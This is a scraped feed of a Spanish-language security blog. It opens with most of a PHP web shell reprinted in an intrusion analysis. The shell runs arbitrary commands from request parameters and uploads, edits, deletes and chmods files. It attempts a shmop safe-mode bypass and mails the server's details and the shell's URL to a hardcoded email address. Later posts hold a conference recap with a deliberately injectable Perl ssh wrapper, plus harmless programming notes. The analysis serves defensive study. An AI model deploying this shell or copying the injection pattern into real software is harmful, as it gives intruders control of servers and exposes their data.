 if (empty($CMD[1])) {
  $CMD[1] = shell_exec($CMDs);
 }
  elseif (empty($CMD[1])) {
  $CMD[1] = passthru($CMDs);
 }
 elseif (empty($CMD[1])) {
  $CMD[1] = system($CMDs);
 }
 elseif (empty($CMD[1])) {
  $handle = popen($CMDs, 'r');
  while(!feof($handle)) {
   $CMD[1][] .= fgets($handle);
  }
  pclose($handle);
 }
 return $CMD[1];
 }

if (@$_GET['chdir']) {
 $chdir = $_GET['chdir'];
} else {
  $chdir = getcwd()."/";
 }
if (@chdir("$chdir")) {
 $msg = "TAG font color=\"#008000\"> Pintu Masuk ke Direktori, OK!";
} else {
 $msg = "TAG font color=\"#FF0000\">Error: Gagal masukkan ke folder!";
 $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
 $chdir = str_replace(chr(92), chr(47), $chdir);

if (@$_GET['action'] == 'upload') {
 $uploaddir = $chdir;
 $uploadfile = $uploaddir. $_FILES['userfile']['name'];
 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .

$_FILES['userfile']['name'])) {
 $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$_FILES['userfile']['name']}, Upload File Berjaya.

";
 } else {
   $msg = "TAG font color=\"#FF0000\">Error: Upload File Gagal.";
  }
}
elseif (@$_GET['action'] == 'mkdir') {
   $newdir = $_GET['newdir'];
   if (@mkdir("$chdir"."$newdir")) {
    $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$newdir}, folder

berhasil dibuat. ";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Pembuatan folder
gagal.";
     }
}
elseif (@$_GET['action'] == 'newfile') {
   $newfile = $_GET['newfile'];
   if (@touch("$chdir"."$newfile")) {
    $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$newfile}, berhasil

dibuat! ";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Tak Boleh Buat File!";
     }
}

elseif (@$_GET['action'] == 'del') {
    $file = $_GET['file']; $type = $_GET['type'];
    if ($type == 'file') {
     if (@unlink("$chdir"."$file")) {
      $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$file}, Berhasil

menghapus arsip (file)!";
     } else {
        $msg = "TAG font color=\"#FF0000\">Error: Gagal menghapuskan File
(file)!";
       }
    } elseif ($type == 'dir') {
       if (@rmdir("$chdir"."$file")) {
         $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$file}, Berhasil

menghapus folder!";
       } else {
          $msg = "TAG font color=\"#FF0000\">Error: Gagal menghapuskan
folder!";
         }
      }
}
elseif (@$_GET['action'] == 'chmod') {
    $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
    if (@chmod ("$file", $chmod)) {

     $msg = "TAG font color=\"#008000\">Chmod dari TAG font color=\"#000080\">{$_GET['file']} TAG font color=\"#008000\">berubah
menjadi

TAG font color=\"#000080\">$chmod TAG font color=\"#008000\">:
Sukses!";
    } else {
       $msg = 'TAG font color=\"#FF0000\">Error: Gagal mengubah
chmod.';
      }
}
elseif (@$_GET['action'] == 'rename') {
    $file = $_GET['file']; $newname = $_GET['newname'];
    if (@rename("$chdir"."$file", "$chdir"."$newname")) {
     $msg = "TAG font color=\"#008000\">Archive TAG font color=\"#000080\">{$file}

TAG font color=\"#008000\">named for TAG font color=\"#000080\">{$newname} TAG font color=\"#008000\">successfully!";
    } else {
       $msg = "TAG font color=\"#FF0000\">Error: Gagal menukar File.";
      }
}
elseif (@$_GET['action'] == 'copy') {
   $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
   if (@copy("$file", "$copy")) {
    $msg = "TAG font color=\"#000080\">{$file}, TAG font color=\"#008000\">disalin

menjadi TAG font color=\"#000080\">{$copy} TAG font color=\"#008000\">

Berhasil!";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Gagal menyalin  TAG font color=\"#000000\">{$file} TAG font color=\"#FF0000\">menjadi
TAG font color=\"#000000\">{$copy}";
     }
}
/* Parte Atualiza 02:48 12/2/2006 */

elseif (@$_GET['action'] == 'cmd') {
 if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
 $cmd = stripslashes(trim($cmd));
 $result_arr = cmd($cmd);

 $afim = count($result_arr); $acom = 0; $msg = '';
 $msg .= "
Hasil : ".$cmd."

";
 if ($result_arr) {
 while ($acom <= $afim) {
  $msg .= "
 ".@$result_arr[$acom]."

";
 $acom++;
  }
 }
 else {
 $msg .= "
Error: Gagal Menjalankan perintah.

";
 }
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
 echo "Loading... module
";

   if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
       @dl('php_shmop.dll');
   } else {
       @dl('shmop.so');
   }
}

if (@extension_loaded('shmop')) {
 echo "Module: shmop loaded!
";

 $shm_id = @shmop_open(0xff2, "c", 0644, 100);
 if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
 $data="\x00";
 $offset=-3842685;
 $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
 if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire
length of

data\n"; }
 if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for
deletion."; }
 echo passthru("id");
 shmop_close($shm_id);

} else { echo "Module: shmop tidak dimuat!
"; }
}

elseif (@$_GET['action'] == 'zipen') {
 $file = $_GET['file'];
 $zip = @zip_open("$chdir"."$file");
 $msg = '';
if ($zip) {

   while ($zip_entry = zip_read($zip)) {
       $msg .= "Name:               " . zip_entry_name($zip_entry) . "\n";
       $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) .
"\n";
       $msg .= "Compressed Size:    " .
zip_entry_compressedsize($zip_entry) . "\n";
       $msg .= "Compression Method: " .
zip_entry_compressionmethod($zip_entry) . "\n";

       if (zip_entry_open($zip, $zip_entry, "r")) {
           echo "File Contents:\n";
           $buf = zip_entry_read($zip_entry,
zip_entry_filesize($zip_entry));
           echo "$buf\n";

           zip_entry_close($zip_entry);
       }
       echo "\n";

   }

   zip_close($zip);

}
}
elseif (@$_GET['action'] == 'edit') {
 $file = $_GET['file'];
 $conteudo = '';
 $filename = "$chdir"."$file";
 $conteudo = @file_get_contents($filename);
 $conteudo = htmlspecialchars($conteudo);
 $back = $_SERVER['HTTP_REFERER'];
 echo "
Editing {$file} ...

";
 echo "
";
 echo "
";
 echo "


";
 echo "

";
 echo "
";
 echo "
";
 echo "
";
 print "{$conteudo}

";
 echo "
";
 echo "
 ";
 echo "
 ";
 echo "

";
 echo "

";
}
elseif (@$_GET['action'] == 'save') {
  $filename = "$chdir".$_GET['file'];
  $somecontent = $_POST['S1'];
  $somecontent = stripslashes(trim($somecontent));
  if (is_writable($filename)) {
   @$handle = fopen ($filename, "w");
   @$fw = fwrite($handle, $somecontent);
   @fclose($handle);
   if ($handle && $fw) {
    $msg = "TAG font color=\"#000080\">{$_GET['file']}, TAG font color=\"#008000\">berhasil diedit!";
   }
 } else {
   $msg = "TAG font color=\"#000000\">{$_GET['file']}, TAG font color=\"#FF0000\">tidak

bisa ditulisi!";
  }
}

// Informa?s
 $cmdget = '';
 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
 $cmdget = htmlspecialchars($cmdget);
 function asdads() {
 $asdads = '';
 if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
 if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
 if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
 if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
 if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
 return $asdads;
 }

echo "
";
echo "
";
echo "
Informasi

";
echo "
";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
 if (strtoupper(substr($OS, 0,3) != 'WIN')) {
 $Methods = asdads();
 if ($Methods == '') { $Methods = "???"; }
 echo "
";
 echo "


 ";
 echo "


";
 echo "

";
 }

echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo " Sistem  
: {$OS}
";
echo " Nama 
: {$UNAME}
";
echo " PHP 
: {$PHPv},  Safe Mode : {$SafeMode}
";
 echo "Methods 
: {$Methods}
";
echo " IP 
: {$IpServer}
";
echo " Perintah 
:



";
echo "


";
// Dir

echo "
";
echo "
";
if (is_writable("$chdir")) {
 if (strtoupper(substr($OS, 0,3) == 'WIN')) {
 echo "
Dir YES: {$chdir} - Folder Baru | File Baru | Remote

Access

";
 } else {
   echo "
Dir YES: {$chdir} - Folder Baru | File Baru | Kembali
";
  }
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
 echo "
Dir NO: {$chdir} - Foldr Baru | File Baru | Remote

Access

";
 } else {
   echo "
Dir NO: {$chdir} - Folder Baru | File Baru | Kembali

";
  }
}

if (@!$handle = opendir("$chdir")) {
 echo " Gue gak bisa masuk folder, Klik sini!
untuk Kembali ke folder ori!
";
}
else {
echo "
";
echo "
";
echo "


";
echo "    

";
echo "
";
echo "


";
echo "    

";
echo "
";
echo "


";
} else {
  echo "
$msg

";
 }
echo "    

";
echo "
";
echo "


";
echo "    
 Upload:";
echo "
";
echo "
 
";
if (@!$msg) {
 echo "
Messages
 


 ";
echo "
";
echo "
 ";
echo "


";
echo "


";
echo "


";
echo "


";
echo "     

";
$colorn = 0;
   while (false !== ($file = readdir($handle))) {
       if ($file != '.') {
           if ($colorn == 0) {
            $color = "style=\"background-color: #FF9900\"";
           }
           elseif ($colorn == 1) {
            $color = "style=\"background-color:  #FFCC33\"";
           }
           if (@is_dir("$chdir"."$file")) {
            $file = $file.'/';
            $mode = 'chdir';
           } else {
              $mode = 'edit';
            }
           if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
             $chdir .= '/';
           }
           if ($file == '../') {
            $lenpath = strlen($chdir); $baras = 0;
            for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') {
$baras++; } }
            $chdir_ = explode("/", $chdir);
            $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
           }
           $perms = @fileperms ("$chdir"."$file");
           if ($perms == '') {
            $perms = '???';
           }
           $size = @filesize ("$chdir"."$file");
           $size = $size / 1024;
           $size = explode(".", $size);
           if (@$size[1] != '') {
            $size = $size[0].'.'.@substr("$size[1]", 0, 2);
           } else {
              $size = $size[0];
            }
           if ($size == 0) {
            if ($mode == 'chdir') {
             $size = '???';
            }
           }
           echo "
";
    echo "


";
           if (@is_writable ("$chdir"."$file")) {
            if ($mode == 'chdir') {
             if ($file == '../') {
              echo "


";
             } else {
                echo "


";
               }
            } else {
 if (is_readable("$chdir"."$file")) {
                echo "


";
               } else {
                  echo "


";
                 }
              }
           }
          else {
            if ($mode == 'chdir') {
             if ($file == '../') {
              echo "


";
             } else {
                echo "


";

              }
            } else {
 if (@is_readable("$chdir"."$file")) {
                echo "


";
               } else {
                  echo "


";
                }
              }
            }
           echo "


";
           if ($mode == 'edit') {
            echo "


";
           } else {
              echo "


";
             }
           echo "

";
           if ($colorn == 0) {
            $colorn = 1;
           }
           elseif ($colorn == 1) {
            $colorn = 0;
           }
       }
   }
   closedir($handle);
}

 $OS = @PHP_OS;
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF
"; }
 else { $SafeMode = "$SafeMode
"; }

 $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

 $psn=("OS = " . $OS . "
UNAME = " . $UNAME . "
PHPVersion = " .
$PHPv . "
Safe

Mode = " . $SafeMode . "
TAG font color=blue>http://" . $injek .
"
Ingat jangan

Guna Target Ini.
By: NABIL");

 $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To:
$replyto\r\n";
 $header .= "MIME-Version: 1.0\r\n";
 If ($file_name) $header .= "Content-Type: multipart/mixed;
boundary=$uid\r\n";
 If ($file_name) $header .= "--$uid\r\n";
 $header .= "Content-Type: text/$contenttype\r\n";
 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
 $header .= "$message\r\n";
 If ($file_name) $header .= "--$uid\r\n";
 If ($file_name) $header .= "Content-Type: $file_type;
name=\"$file_name\"\r\n";
 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
 If ($file_name) $header .= "Content-Disposition: attachment;

filename=\"$file_name\"\r\n\r\n";
 If ($file_name) $header .= "$content\r\n";
 If ($file_name) $header .= "--$uid--";
 $to = ("haumil@gmail.com");
 $subject = ("Inbox linda.");
 mail($to,$subject,$psn,$header);

@include "$bn";
?>
 
 Permision
 Nama File 
 Kapasiti 
 Perintah
 $perms
 TAG font color=\"#008000\">$file 
 TAG font color=\"#008000\">$file 
 TAG a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file
 $file 
 $file
 $file
 $file
 $file
 $size KB
 Rename | Del

| Chmod | Copy 
 Rename | Del

| Chmod | Copy









Esta un poco mejor shell99, pero tampoco esta mal, lo que si es que se ve que han tenido tiempo no para desarrollar sino para encontrar los scripts y usarlos, interesante se ve que hay una o 2 personas que mas o menos le dan a la codificacion en perl y un poco en PHP pero en realidad las botnets no estan muy desarrolladas.
Esta decente el botnet, se puede tomar control de ella y obvamente no hacen mucho por generar una botnet mas compleja y mas grande, sin embargo me da la idea para desarrollar una de prueba de concepto durante estas fechas que ando de relax de programar en python para pruebas de volumen.
Bueno despues de tanto codigo .. me lanzo ….
]]>
			http://security-dojo.com/programming-bits/analisis-de-una-intrusion-y-un-bot/feed/
		0
		
		
		
		http://security-dojo.com/programming-bits/la-tarjeta-de-security-dojo/
		http://security-dojo.com/programming-bits/la-tarjeta-de-security-dojo/#comments
		Thu, 25 Dec 2008 22:53:59 +0000
		Enrique Alfonso Sanchez Montellano
				

		http://security-dojo.com/?p=28
		
			Bueno pues esta navidad en security dojo hicimos la carta a santa claus y no llego el muy cabron, pero lo explotaremos asi como a otras cosas mas como debe de ser, agrego rapidamente el embedido de la tarjeta que le pedimos en 1 ciento y el nunca mando:








Asi que si alguien se avienta a patrocinarla me avisan! jajajaja en el inter estoy terminando una investigacion sobre la seguridad de netkey en algunos bancos y creanme … va a ser bonito ver como un monton de gente patina, sobre todo la chavita de la Universidad Anahuac en clase de maestria que practicamente me reto a que tronara el netkey de Banorte. Esta va por ti nena!!! que Dios salvaguarde tu jale cuando lean esto!!! JAJAJAJA
]]>
			http://security-dojo.com/programming-bits/la-tarjeta-de-security-dojo/feed/
		6
		
		
		
		http://security-dojo.com/programming-bits/conferencia-en-la-univo/
		http://security-dojo.com/programming-bits/conferencia-en-la-univo/#comments
		Wed, 19 Nov 2008 20:17:32 +0000
		Enrique Alfonso Sanchez Montellano
				
		

		http://security-dojo.com/?p=16
		
			Me invitaron a dar una conferencia y un taller en la UNIVO, estuvo excelente la verdad, me gusto que estuviera llena la conferencia que di y mas que mas de la mitad hubieran estado en la conferencia pasada, el titulo de la conferencia fue:

Seguridad Informatica: Pasado, Presente y Futuro – Casos de Estudio
La verdad estuvo interesante porque dejamos los slides de lado y nos pusimos a ver fallos de ayer, de hoy y de mañana en varios lugares, la verdad no pude aplicar la de un buen XSS para el phishing porque estaba haciendo un caor de la fregada y ya andaba en modo zombi pero se puso bueno en realidad.
Asi que aqui les dejo la conferencia, los slides estan muy muy genericos sin embargo tambien dejo los programas que se vieron dentro de la conferencia, no puedo dejar los URL ya que se hizo con el sistema de la UNIVO, lo siento.




Los ejemplos fueron los mas basicos para mostrar fallos que aun ahora se encuentran en servidores:

#!/usr/bin/perl
#

print "Bienvenido al proxy de autenticacion de la red segura de Victima.net, escriba el servidor interno: ";
$server = < STDIN >;
chomp($server);
system("ssh -l externo $server");


Ese tipo de ejemplos facilitos para ejemplificar la forma en que todavia se hackean servidores de universidades grandes que ofrecen servicios como pine para sus usuarios, aun funciona con planetas, dragones, etc.
Igual ejemplos de malas contraseñas, inyecciones avanzadas de SQL, algunas maquinas de estado, utilizacion de la libreria de GAUL para mutar strings para el fuzzing, etc. cosas basiquitas.
En fin .. me lanzo a jalar que hoy tengo un poco de jale …
]]>
			http://security-dojo.com/programming-bits/conferencia-en-la-univo/feed/
		0
		
		
		
		http://security-dojo.com/programming-bits/codefetch/
		http://security-dojo.com/programming-bits/codefetch/#comments
		Sat, 25 Oct 2008 15:57:40 +0000
		Enrique Alfonso Sanchez Montellano
				
		
		
		
		

		http://security-dojo.com/programming-bits/codefetch/
		
			Siempre me preguntan que que lenguajes debes de conocer o poder programar en ellos para poder tener un buen esquema de seguridad obviamente a bajo nivel, todavia no veo como podria necesitar alguien codigo para hacer una politica (no que vaya a ayudar mucho a detener a un atacante si no la implementas claro)

Jugando con stumbleupon encontre este sitio:
www.codefetch.com



Y rapidamente me quede impresionado con la idea, esta excelente para dudas, ejemplos de codigo y los llamados snippets para cosas rapidas que luego se requieren en auditorias, o en cursos para ejemplos de programacion.
O aun mejor, simplemente para aprender nuevos lenguajes o saber que hace un codigo de un lenguaje con el que no estas completamente familiarizado.
Una buena recomendacion.
]]>
			http://security-dojo.com/programming-bits/codefetch/feed/
		1
		
		
		
		http://security-dojo.com/programming-bits/prog-extrem/
		http://security-dojo.com/programming-bits/prog-extrem/#comments
		Mon, 14 Apr 2008 18:29:29 +0000
		Enrique Alfonso Sanchez Montellano
				
		

		http://security-dojo.com/uncategorized/eaea-intento-1/
		
			Programacion Extrema NO es una programacion que sube montanas, anda en motocross y se avienta escaladas libres, es una programacion que busca optimizar el numero de lineas, complejidad y velocidad de las cosas, un ejemplo es lo que llamo un arreglo de funciones, o tambien funciones flexibles, un programa normal que busca comandos dentro de un archivo podria verse asi:



#include < stdio.h >
#include < unistd.h >
int funcion1(char *linea) {
printf("orale entro a funcion1\n");
return 0;
}
int funcion2(char *linea) {
printf("entramos a funcion2 %s\n", linea);
return 0;
}
int main(int argc, char **argv) {
if(argc < 2) {
printf("Uso: %s < palabra >\n", argv[0]);
return -1;
}
printf("ahora mandamos ejecutar funcion1\n");
funcion1(argv[1]);
printf("ahora ejecutando funcion2\n");
funcion2(argv[1]);
printf("terminamos\n");
return 0;
}


la salida del archivo es la siguiente:
root@firebolt f00 # gcc -o normal normal.c
root@firebolt f00 # ./normal www.soldemorelia.com.mx

Ahora mandamos ejecutar funcion1
se mando www.soldemorelia.com.mx a funcion1
ahora ejecutando funcion2
se mando www.soldemorelia.com.mx a funcion2
terminamos
root@firebolt f00 #

Un programa que es flexible es el siguiente:
#include < stdio.h >
#include < unistd.h >
struct ejemplo {
int id;
char *nombre;
int (*execute)(char *linea);
};
int funcion1(char *linea) {
printf("se mando %s a funcion1\n", linea);
return 0;
}
int funcion2(char *linea) {
printf("se mando %s a funcion2\n", linea);
return 0;
}
struct ejemplo f[] = {{1, "funcion numero 1", funcion1},{2, "function numero 2", funcion2}, {0, NULL, NULL}};
int main(int argc, char **argv) {
int i = 0;
if(argc < 2) {
printf("Uso: %s < palabra >\n", argv[0]);
return -1;
}
printf("ahora mandamos ejecutar funcion1\n");
f[0].execute(argv[1]);
printf("ahora ejecutando funcion2\n");
f[1].execute(argv[1]);
printf("terminamos\n");
return 0;
}

El codigo es un poco mas largo pero si se quisiera agregar una funcion extra solo se tendria que agregar la funcion y una linea a a estructura, esto da la posibilidad de hacer funciones o cambiar funciones al vuelo y decir “si la palabra es asi has esto si no has lo otro” sin utilizar tanas lineas de codigo y mucho mas facil de leer y mantener.
Regresamos al codigo puro! La proxima semana veremos un programa que nos deja checar servidores y que utiliza ¡funciones flexibles!
]]>
			http://security-dojo.com/programming-bits/prog-extrem/feed/
		4